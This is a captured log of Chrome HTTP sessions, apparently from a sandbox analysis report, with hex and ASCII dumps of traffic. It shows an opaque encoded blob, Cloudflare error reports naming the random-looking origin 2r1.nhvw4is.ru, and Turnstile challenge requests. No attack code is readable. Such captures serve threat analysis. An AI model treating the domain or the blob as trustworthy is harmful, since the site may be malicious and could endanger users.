                                                                                                                                                              2024-01-17 16:39:06 UTC722INData Raw: 37 64 32 62 0d 0a 6f 49 43 6f 6f 34 4c 48 76 59 71 4b 7a 4a 7a 4c 69 71 36 53 74 63 72 48 70 62 53 6f 7a 4e 50 5a 73 64 2b 79 77 64 65 74 73 63 43 31 73 71 6a 44 75 62 57 6f 7a 63 4b 6f 33 63 75 2f 7a 63 58 54 74 75 69 76 74 4c 72 6f 7a 74 33 78 37 38 33 63 30 63 7a 56 33 4e 51 49 30 66 6a 4a 36 66 6e 70 32 2b 6e 68 38 65 45 55 41 50 62 70 47 41 54 34 36 76 6b 4b 2b 75 76 35 38 51 50 6a 4a 43 51 44 39 67 49 6b 4a 77 6e 6f 37 41 6a 37 49 43 67 66 41 54 51 77 4d 67 55 53 38 42 73 50 4d 43 6f 74 44 42 6f 53 4a 42 49 4f 4f 45 55 55 49 67 6b 73 48 7a 77 34 53 53 30 4e 53 43 77 67 52 45 42 45 4a 7a 4d 56 4d 53 67 32 4f 6b 70 4a 4c 7a 38 32 50 7a 6c 67 56 6b 5a 63 49 45 46 59 53 30 4a 4d 5a 6c 6c 45 62 57 30 79 58 6d 78 78 53 32 35 76 61 58 56 51 62 6e 51 7a 62
                                                                                                                                                              Data Ascii: 7d2boICoo4LHvYqKzJzLiq6StcrHpbSozNPZsd+ywdetscC1sqjDubWozcKo3cu/zcXTtuivtLrozt3x783c0czV3NQI0fjJ6fnp2+nh8eEUAPbpGAT46vkK+uv58QPjJCQD9gIkJwno7Aj7ICgfATQwMgUS8BsPMCotDBoSJBIOOEUUIgksHzw4SS0NSCwgREBEJzMVMSg2OkpJLz82PzlgVkZcIEFYS0JMZllEbW0yXmxxS25vaXVQbnQzb
                                                                                                                                                              2024-01-17 16:39:06 UTC1369INData Raw: 7a 73 76 63 34 4d 37 51 34 74 54 53 31 4f 58 59 31 74 6a 72 33 4e 72 63 38 75 44 65 34 4f 6a 6b 34 75 54 72 36 4f 62 6f 38 75 7a 71 37 50 58 77 37 76 44 38 39 50 4c 30 41 2f 6a 32 2b 41 62 6e 43 52 4c 30 41 77 50 72 39 78 41 44 37 52 41 55 46 68 2f 58 44 77 48 75 47 75 44 65 39 41 4d 48 48 41 55 41 41 7a 41 65 2b 75 34 4f 4a 53 30 6b 38 67 67 6f 43 69 73 75 4a 67 30 75 50 6a 41 55 44 51 4d 30 47 68 41 58 4a 41 59 6a 4e 7a 63 46 4f 69 4d 78 45 43 67 4f 4e 68 4d 58 52 54 6c 4e 47 42 4d 32 4b 6b 35 4f 57 7a 45 38 56 6c 34 7a 5a 6c 63 7a 4b 46 30 69 59 32 68 67 54 6d 56 71 52 53 70 49 4d 58 5a 4f 61 48 42 7a 54 44 5a 62 63 6d 38 39 66 59 4a 62 63 47 5a 6c 57 58 31 6a 56 6f 64 63 61 47 5a 67 67 58 35 64 67 32 43 4d 59 57 53 4a 62 48 53 57 69 57 31 70 62 4a 64
                                                                                                                                                              Data Ascii: zsvc4M7Q4tTS1OXY1tjr3Nrc8uDe4Ojk4uTr6Obo8uzq7PXw7vD89PL0A/j2+AbnCRL0AwPr9xAD7RAUFh/XDwHuGuDe9AMHHAUAAzAe+u4OJS0k8ggoCisuJg0uPjAUDQM0GhAXJAYjNzcFOiMxECgONhMXRTlNGBM2Kk5OWzE8Vl4zZlczKF0iY2hgTmVqRSpIMXZOaHBzTDZbcm89fYJbcGZlWX1jVodcaGZggX5dg2CMYWSJbHSWiW1pbJd
                                                                                                                                                              2024-01-17 16:39:06 UTC1369INData Raw: 36 54 6a 75 73 72 46 35 4f 72 47 75 62 2b 73 77 76 43 79 30 2b 7a 68 39 39 6e 77 75 72 6a 64 39 4c 2f 68 34 66 6a 45 31 65 58 38 78 50 73 44 78 64 76 64 79 51 4c 6b 35 4f 45 46 44 64 48 6c 38 68 50 55 7a 66 41 55 45 2b 6b 59 39 75 7a 78 47 51 44 6b 32 65 59 54 49 76 67 4c 41 79 41 6c 36 51 48 37 4a 2b 30 71 47 43 76 78 4c 2f 59 76 39 54 4d 32 4d 2f 6b 34 51 77 30 69 46 30 41 43 46 77 49 58 4f 54 31 49 4f 6a 45 62 4a 78 4d 52 55 31 64 42 4f 52 4d 53 4e 54 31 56 48 6b 64 4a 57 30 31 4c 54 56 35 52 54 31 46 6b 56 56 4e 56 61 31 6c 58 57 57 46 64 57 31 31 6b 55 6b 52 71 5a 32 64 4a 61 44 6c 76 55 57 42 4e 58 56 56 66 67 47 46 5a 56 6a 39 79 53 6f 64 57 5a 6f 46 74 66 48 4e 76 62 57 47 43 6c 6d 70 32 56 4a 4a 76 6d 5a 6c 35 63 57 75 54 67 59 57 55 6d 35 61 53
                                                                                                                                                              Data Ascii: 6TjusrF5OrGub+swvCy0+zh99nwurjd9L/h4fjE1eX8xPsDxdvdyQLk5OEFDdHl8hPUzfAUE+kY9uzxGQDk2eYTIvgLAyAl6QH7J+0qGCvxL/Yv9TM2M/k4Qw0iF0ACFwIXOT1IOjEbJxMRU1dBORMSNT1VHkdJW01LTV5RT1FkVVNVa1lXWWFdW11kUkRqZ2dJaDlvUWBNXVVfgGFZVj9ySodWZoFtfHNvbWGClmp2VJJvmZl5cWuTgYWUm5aS
                                                                                                                                                              2024-01-17 16:39:06 UTC1369INData Raw: 50 45 34 61 6d 75 33 2f 44 76 7a 4b 37 6c 74 2b 50 4a 2f 76 58 4b 7a 73 72 30 76 73 33 68 75 41 63 43 2b 50 4d 46 2b 65 62 45 37 63 6e 71 36 73 2f 73 33 67 58 34 37 75 48 33 38 68 66 39 2f 50 41 55 41 76 34 42 2b 77 50 33 33 79 44 2b 39 50 6b 68 43 4f 66 71 36 51 59 7a 49 65 34 48 4c 44 59 76 4b 79 59 54 48 42 34 64 45 54 73 67 2b 2f 73 78 48 54 73 56 50 44 4d 70 4e 7a 67 74 50 7a 30 36 54 41 73 6c 4d 78 4d 79 44 7a 68 50 4d 43 51 33 4b 6b 34 30 48 6a 42 43 4d 31 4a 45 52 31 77 39 57 69 45 65 4b 32 56 41 50 55 39 48 54 6d 6b 75 51 32 5a 72 4d 6d 39 4d 62 7a 5a 79 59 48 4d 36 64 7a 39 33 50 6e 78 59 65 30 4a 2f 67 6e 39 47 68 49 39 5a 62 6d 4f 4d 54 6d 4e 4f 59 34 57 4a 6c 49 5a 39 5a 34 39 78 63 33 32 4d 6b 49 56 30 64 35 4f 51 6f 61 57 54 6c 61 65 5a 6c
                                                                                                                                                              Data Ascii: PE4amu3/DvzK7lt+PJ/vXKzsr0vs3huAcC+PMF+ebE7cnq6s/s3gX47uH38hf9/PAUAv4B+wP33yD+9PkhCOfq6QYzIe4HLDYvKyYTHB4dETsg+/sxHTsVPDMpNzgtPz06TAslMxMyDzhPMCQ3Kk40HjBCM1JER1w9WiEeK2VAPU9HTmkuQ2ZrMm9MbzZyYHM6dz93PnxYe0J/gn9GhI9ZbmOMTmNOY4WJlIZ9Z49xc32MkIV0d5OQoaWTlaeZl
                                                                                                                                                              2024-01-17 16:39:06 UTC1369INData Raw: 78 30 38 4c 6b 34 75 50 4a 37 65 66 6f 36 72 72 68 36 2b 58 35 35 65 2f 31 2f 65 6e 7a 2b 67 4c 74 39 2f 77 47 38 66 73 47 35 65 50 7a 44 52 63 46 42 66 6a 32 30 50 45 67 32 52 58 7a 4a 4f 55 5a 46 68 7a 6c 49 68 6a 6b 4a 53 73 6e 36 43 6b 76 4d 2b 77 74 4d 7a 50 77 4d 54 66 7a 39 44 55 38 43 66 67 35 50 78 58 38 50 55 4d 56 41 55 46 48 4a 53 55 33 54 78 6b 51 4f 6b 78 49 54 6c 63 6a 4a 53 4d 31 4a 6c 63 6e 4f 44 73 63 4d 44 6b 63 59 7a 4d 39 51 6d 59 34 53 79 74 70 62 56 78 72 63 45 30 77 5a 6a 4a 4d 56 57 5a 34 65 6d 4e 52 53 32 30 37 50 33 31 78 50 32 39 43 65 6b 42 47 68 58 35 47 68 33 6c 33 68 55 46 37 65 6e 79 52 5a 34 2b 4a 62 56 53 46 6d 31 4e 58 68 35 68 59 6f 5a 42 64 6e 35 6d 66 5a 4a 4e 65 6d 47 64 2b 70 61 52 6f 71 34 4f 6f 68 33 32 43 71 5a
                                                                                                                                                              Data Ascii: x08Lk4uPJ7efo6rrh6+X55e/1/enz+gLt9/wG8fsG5ePzDRcFBfj20PEg2RXzJOUZFhzlIhjkJSsn6CkvM+wtMzPwMTfz9DU8Cfg5PxX8PUMVAUFHJSU3TxkQOkxITlcjJSM1JlcnODscMDkcYzM9QmY4SytpbVxrcE0wZjJMVWZ4emNRS207P31xP29CekBGhX5Gh3l3hUF7enyRZ4+JbVSFm1NXh5hYoZBdn5mfZJNemGd+paRoq4Ooh32CqZ
                                                                                                                                                              2024-01-17 16:39:06 UTC1369INData Raw: 38 2f 37 49 33 64 4c 37 76 64 4b 39 30 76 54 34 42 50 58 73 31 73 54 4c 7a 66 37 2b 36 76 50 4f 34 76 44 34 45 64 6b 44 42 52 63 4a 42 77 6b 61 44 51 73 4e 49 42 45 50 45 53 63 56 45 78 55 64 47 52 63 5a 49 42 30 62 48 53 63 68 48 79 45 71 4a 53 4d 6c 4d 53 6b 6e 4b 54 63 74 4b 79 30 36 4d 53 38 77 42 6a 55 7a 4e 41 55 35 4e 7a 67 4d 50 54 73 39 4a 6a 4d 6e 49 6a 6b 73 53 55 31 50 57 6c 35 49 4e 45 4a 4e 54 69 4d 66 48 54 55 37 50 47 4d 6d 5a 6a 34 6c 57 47 70 52 53 57 41 7a 56 44 46 4c 53 30 78 7a 4e 6e 5a 4f 4e 57 68 36 59 44 56 77 51 32 52 42 58 31 74 63 67 30 61 47 58 6b 56 34 69 6e 42 2f 67 46 4e 30 55 58 4e 72 62 4a 4e 57 6c 6d 35 56 69 58 65 50 59 58 57 66 63 33 53 5a 64 70 56 31 64 36 4b 71 5a 36 74 70 73 71 4f 73 73 48 4f 33 6a 33 4b 37 72 34 36
                                                                                                                                                              Data Ascii: 8/7I3dL7vdK90vT4BPXs1sTLzf7+6vPO4vD4EdkDBRcJBwkaDQsNIBEPEScVExUdGRcZIB0bHSchHyEqJSMlMSknKTctKy06MS8wBjUzNAU5NzgMPTs9JjMnIjksSU1PWl5INEJNTiMfHTU7PGMmZj4lWGpRSWAzVDFLS0xzNnZONWh6YDVwQ2RBX1tcg0aGXkV4inB/gFN0UXNrbJNWlm5ViXePYXWfc3SZdpV1d6KqZ6tpsqOssHO3j3K7r46
                                                                                                                                                              2024-01-17 16:39:06 UTC1369INData Raw: 66 7a 2b 38 67 4c 35 79 51 4d 49 35 4d 6e 4d 43 2f 6e 38 44 51 6f 4e 44 77 4d 53 43 74 6b 54 46 2b 2f 5a 33 42 73 4b 44 65 45 61 48 52 38 54 49 68 72 70 49 79 63 66 36 65 77 72 47 68 34 48 4b 69 30 76 49 7a 49 71 2b 54 4d 34 48 66 6e 38 4f 79 6f 75 4c 54 6f 39 50 7a 4e 43 46 52 6b 47 49 79 41 6c 53 55 70 46 4d 45 63 75 46 45 6c 4c 49 79 55 54 46 7a 77 77 47 56 46 4b 48 78 73 5a 4d 54 63 34 58 79 4a 69 4f 69 46 55 5a 6b 49 68 58 43 39 51 4c 55 64 48 53 47 38 79 63 6b 6f 78 5a 47 78 30 64 32 74 36 63 32 46 4f 57 57 51 2f 67 33 4a 47 53 59 64 32 65 45 36 47 69 59 74 2f 6a 6f 5a 57 6a 32 61 4a 69 48 69 50 66 6f 5a 73 62 59 6d 42 6c 6d 53 54 68 49 52 31 6b 59 6d 65 62 4a 75 4d 6a 48 32 5a 6b 5a 53 73 6a 35 36 76 72 4c 43 79 6a 61 69 70 74 71 69 4b 74 72 71 55
                                                                                                                                                              Data Ascii: fz+8gL5yQMI5MnMC/n8DQoNDwMSCtkTF+/Z3BsKDeEaHR8TIhrpIycf6ewrGh4HKi0vIzIq+TM4Hfn8OyouLTo9PzNCFRkGIyAlSUpFMEcuFElLIyUTFzwwGVFKHxsZMTc4XyJiOiFUZkIhXC9QLUdHSG8yckoxZGx0d2t6c2FOWWQ/g3JGSYd2eE6GiYt/joZWj2aJiHiPfoZsbYmBlmSThIR1kYmebJuMjH2ZkZSsj56vrLCyjaiptqiKtrqU
                                                                                                                                                              2024-01-17 16:39:06 UTC1369INData Raw: 51 43 42 51 66 36 43 74 7a 67 7a 65 72 6e 37 42 45 53 43 2f 63 50 39 64 73 52 45 2b 72 73 32 74 34 45 39 2b 41 44 45 75 62 69 34 50 6a 2b 41 43 66 70 4b 67 4c 6f 48 43 34 50 4d 79 54 32 47 50 51 50 44 78 41 33 2b 54 6f 53 2b 43 77 2b 49 66 67 30 42 79 67 46 49 78 38 67 52 77 70 4b 49 67 6b 38 54 69 38 4a 52 42 63 34 46 54 63 76 4d 46 63 61 57 6a 49 5a 54 46 35 56 59 31 51 6e 53 43 56 4c 50 30 42 6e 4b 6d 70 43 4b 56 78 75 62 47 4e 6b 4e 31 67 31 5a 55 39 51 64 7a 70 36 55 6a 6c 73 66 6b 42 7a 64 45 64 6f 52 58 6c 66 59 49 64 4b 69 6d 4a 4a 66 49 53 4d 6a 34 4f 53 65 5a 46 5a 63 58 78 62 61 6e 6c 65 59 5a 2b 4f 6b 6e 75 65 6f 61 4f 58 70 70 35 75 70 33 36 68 71 57 79 77 69 70 61 49 67 70 47 57 72 72 57 79 75 6e 65 37 66 63 4b 7a 76 4d 43 44 78 61 43 32 75
                                                                                                                                                              Data Ascii: QCBQf6Ctzgzern7BESC/cP9dsRE+rs2t4E9+ADEubi4Pj+ACfpKgLoHC4PMyT2GPQPDxA3+ToS+Cw+Ifg0BygFIx8gRwpKIgk8Ti8JRBc4FTcvMFcaWjIZTF5VY1QnSCVLP0BnKmpCKVxubGNkN1g1ZU9Qdzp6UjlsfkBzdEdoRXlfYIdKimJJfISMj4OSeZFZcXxbanleYZ+OknueoaOXpp5up36hqWywipaIgpGWrrWyune7fcKzvMCDxaC2u
                                                                                                                                                              2024-01-17 16:39:06 UTC1369INData Raw: 36 7a 2b 72 70 42 41 4c 6b 46 41 59 63 35 76 72 37 43 51 41 65 45 4f 41 63 37 67 63 61 41 4f 59 45 4b 2f 58 6b 4b 53 63 72 2b 51 37 6b 4c 79 51 57 4b 79 73 6b 49 67 6e 33 4f 43 67 4e 44 54 63 72 49 66 34 36 41 78 51 56 49 79 6c 4d 4e 7a 73 75 48 55 73 36 4f 79 41 4d 51 44 51 69 55 7a 6f 34 4b 69 55 2b 52 6c 30 7a 57 54 67 35 48 6a 55 2f 51 57 56 65 58 44 30 34 58 57 70 6d 59 30 5a 4e 5a 46 4a 67 64 47 30 77 62 56 6c 73 54 55 78 4f 66 6e 42 77 65 48 73 32 56 49 42 61 55 6e 4b 43 52 34 79 49 68 33 65 41 5a 49 70 37 68 49 4f 4f 65 4a 53 5a 5a 35 43 4b 6d 48 53 66 69 58 78 32 6c 35 75 47 6c 32 64 36 71 48 75 61 67 4a 5a 6e 5a 6f 74 6e 6f 71 61 74 67 37 43 32 67 37 71 74 74 4c 4f 7a 76 36 43 58 6d 36 4b 68 6c 61 32 67 67 4c 75 2f 71 70 6d 2f 74 71 57 64 69 4d
                                                                                                                                                              Data Ascii: 6z+rpBALkFAYc5vr7CQAeEOAc7gcaAOYEK/XkKScr+Q7kLyQWKyskIgn3OCgNDTcrIf46AxQVIylMNzsuHUs6OyAMQDQiUzo4KiU+Rl0zWTg5HjU/QWVeXD04XWpmY0ZNZFJgdG0wbVlsTUxOfnBweHs2VIBaUnKCR4yIh3eAZIp7hIOOeJSZZ5CKmHSfiXx2l5uGl2d6qHuagJZnZotnoqatg7C2g7qttLOzv6CXm6Khla2ggLu/qpm/tqWdiM


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              16192.168.2.44975435.190.80.14434520C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-01-17 16:39:07 UTC537OUTOPTIONS /report/v3?s=9GwSSkYMo178kButyz32jlFvXFXyc0jsaLG9pP6Vz2pv4%2Fb4cKwYHKz0wzJsq4kWAUVGpYZGM%2B87tChGA2CdA1Hyh9K1k0XQHGEr8O2%2BVf51ENqSMJGcR7LkNOj4M43CtQ%3D%3D HTTP/1.1
                                                                                                                                                              Host: a.nel.cloudflare.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Origin: https://2r1.nhvw4is.ru
                                                                                                                                                              Access-Control-Request-Method: POST
                                                                                                                                                              Access-Control-Request-Headers: content-type
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              2024-01-17 16:39:07 UTC336INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 0
                                                                                                                                                              access-control-max-age: 86400
                                                                                                                                                              access-control-allow-methods: OPTIONS, POST
                                                                                                                                                              access-control-allow-origin: *
                                                                                                                                                              access-control-allow-headers: content-length, content-type
                                                                                                                                                              date: Wed, 17 Jan 2024 16:39:07 GMT
                                                                                                                                                              Via: 1.1 google
                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                              Connection: close


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              17192.168.2.44975535.190.80.14434520C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-01-17 16:39:08 UTC480OUTPOST /report/v3?s=9GwSSkYMo178kButyz32jlFvXFXyc0jsaLG9pP6Vz2pv4%2Fb4cKwYHKz0wzJsq4kWAUVGpYZGM%2B87tChGA2CdA1Hyh9K1k0XQHGEr8O2%2BVf51ENqSMJGcR7LkNOj4M43CtQ%3D%3D HTTP/1.1
                                                                                                                                                              Host: a.nel.cloudflare.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Content-Length: 419
                                                                                                                                                              Content-Type: application/reports+json
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              2024-01-17 16:39:08 UTC419OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 35 37 33 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 32 72 31 2e 6e 68 76 77 34 69 73 2e 72 75 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 37 32 2e 36 37 2e 31 34 38 2e 31 33 31 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22
                                                                                                                                                              Data Ascii: [{"age":0,"body":{"elapsed_time":573,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://2r1.nhvw4is.ru/","sampling_fraction":1.0,"server_ip":"172.67.148.131","status_code":404,"type":"http.error"},"type":"network-error","url":"
                                                                                                                                                              2024-01-17 16:39:08 UTC168INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 0
                                                                                                                                                              date: Wed, 17 Jan 2024 16:39:07 GMT
                                                                                                                                                              Via: 1.1 google
                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                              Connection: close


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              18192.168.2.449756104.17.2.1844434520C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-01-17 16:39:10 UTC775OUTGET /cdn-cgi/challenge-platform/h/b/i/8470083bba6a4201/1705509546863/OYQPYviXYsx_AMf HTTP/1.1
                                                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/hq0sk/0x4AAAAAAAQGgmt388O38mZL/auto/normal
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              2024-01-17 16:39:10 UTC208INHTTP/1.1 200 OK
                                                                                                                                                              Date: Wed, 17 Jan 2024 16:39:10 GMT
                                                                                                                                                              Content-Type: image/png
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 84700864dfea4288-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              2024-01-17 16:39:10 UTC67INData Raw: 33 64 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 08 00 00 00 3b 08 02 00 00 00 c9 83 5c df 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a
                                                                                                                                                              Data Ascii: 3dPNGIHDR;\IDAT$IENDB`
                                                                                                                                                              2024-01-17 16:39:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              19192.168.2.449758104.17.2.1844434520C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-01-17 16:39:12 UTC804OUTGET /cdn-cgi/challenge-platform/h/b/pat/8470083bba6a4201/1705509546867/1ec3802d3c0fe85725e4418799a952df871d31a0bb5d01c39c101922f073ad92/rFQtMclzeP7ExH9 HTTP/1.1
                                                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                              Accept: */*
                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/hq0sk/0x4AAAAAAAQGgmt388O38mZL/auto/normal
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              2024-01-17 16:39:12 UTC152INHTTP/1.1 401 Unauthorized
                                                                                                                                                              Date: Wed, 17 Jan 2024 16:39:12 GMT
                                                                                                                                                              Content-Type: text/plain; charset=UTF-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              2024-01-17 16:39:12 UTC1374INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 48 73 4f 41 4c 54 77 50 36 46 63 6c 35 45 47 48 6d 61 6c 53 33 34 63 64 4d 61 43 37 58 51 48 44 6e 42 41 5a 49 76 42 7a 72 5a 49 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d 45 41 67
                                                                                                                                                              Data Ascii: www-authenticate: PrivateToken challenge=AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gHsOALTwP6Fcl5EGHmalS34cdMaC7XQHDnBAZIvBzrZIAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=, token-key=MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQMEAg
                                                                                                                                                              2024-01-17 16:39:12 UTC6INData Raw: 31 0d 0a 4a 0d 0a
                                                                                                                                                              Data Ascii: 1J
                                                                                                                                                              2024-01-17 16:39:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              20192.168.2.449761104.17.3.1844434520C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-01-17 16:39:12 UTC487OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1672084046:1705509045:1KRCh9wlmdHNe1_uWjab1xjgCNY1yb1dMySJtbe4upc/8470083bba6a4201/20178212f2891c9 HTTP/1.1
                                                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              2024-01-17 16:39:12 UTC386INHTTP/1.1 400 Bad Request
                                                                                                                                                              Date: Wed, 17 Jan 2024 16:39:12 GMT
                                                                                                                                                              Content-Type: application/json
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                              cf-chl-out: mi6yeT+KAvQBY06exC6Iug==$oHAOhJe19R//7TVR3DwEug==
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 84700870c8004261-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              2024-01-17 16:39:12 UTC12INData Raw: 37 0d 0a 69 6e 76 61 6c 69 64 0d 0a
                                                                                                                                                              Data Ascii: 7invalid
                                                                                                                                                              2024-01-17 16:39:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              21192.168.2.449762104.17.3.1844434520C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-01-17 16:39:12 UTC428OUTGET /cdn-cgi/challenge-platform/h/b/i/8470083bba6a4201/1705509546863/OYQPYviXYsx_AMf HTTP/1.1
                                                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              2024-01-17 16:39:12 UTC208INHTTP/1.1 200 OK
